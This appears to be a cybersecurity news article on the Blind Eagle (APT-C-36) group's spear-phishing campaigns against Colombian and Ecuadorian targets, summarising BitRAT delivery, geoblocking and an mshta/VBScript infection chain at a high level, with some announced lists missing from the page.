There have been reports that an organized threat actor, known as Blind Eagle (tracked as APT-C-36), has re-appeared again with a refined toolset and one of the most elaborate infection chains in the history of cyberattacks targeting Colombian and Ecuadorian organizations.
Blind Eagle is a Spanish-speaking hacker group and recently researchers at Check Point uncovered the group’s latest:-
As of 2018, Blind Eagle has been attacking indiscriminately South American nations due to its narrow geographical focus. In September 2021, Trend Micro published a document documenting the activities of the Blind Eagle group.
The distribution of BitRAT malware is being done via spear-phishing campaigns primarily targeting Colombian entities, with a lesser focus on the targets of the following countries:-
Below is a list of some of the banks that are targeted:-
Attack sequences are aborted if the email recipient is located outside Colombia, and Migración Colombia’s official website is redirected to the victim.
An organization masked as the Ecuadorian Internal Revenue Service (SRI) has been waging a campaign targeting Colombia and Ecuador in a similar way. In order to filter out requests that are originating from countries other than the one it is located in, it makes use of the same geoblocking technology.
A much more complex multi-stage process is employed instead of a simple drop of RAT malware in this attack, which exploits the legitimate mshta.exe binary rather than dropping a RAT. This is done by executing VBScript embedded inside an HTML file so that two Python scripts can be downloaded.
The two python scripts are listed below:-
APT groups like Blind Eagle are a strange breed of APT groups regarding attacks. The organization seems more interested in cybercrime and monetary gain than espionage, based on its toolset and routine operations.
Secure Web Gateway – Web Filter Rules, Activity Tracking & Malware Protection – Download Free E-Book
In a disturbing trend, cybercriminals, predominantly from Chinese underground networks, are exploiting Near Field Communication…
In a concerning trend for cybersecurity, multiple threat actors, including ransomware groups and state-sponsored entities,…
Unit 42’s 2025 Global Incident Response Report, ransomware actors are intensifying their cyberattacks, with 86%…
Group-IB’s High-Tech Crime Trends Report 2025 reveals a sharp 22% surge in phishing websites, with…
Cybersecurity firm Volexity has tracked a series of highly targeted attacks by suspected Russian threat…
Threat actors are increasingly leveraging Google Forms, the tech giant’s widely-used form and quiz-building tool,…
![](data:image/svg+xml;charset=utf-8,<svg height="400px" width="600px" xmlns="http://www.w3.org/2000/svg" version="1.1"/>)
.jpeg?w=1024&resize=1024,682&ssl=1)
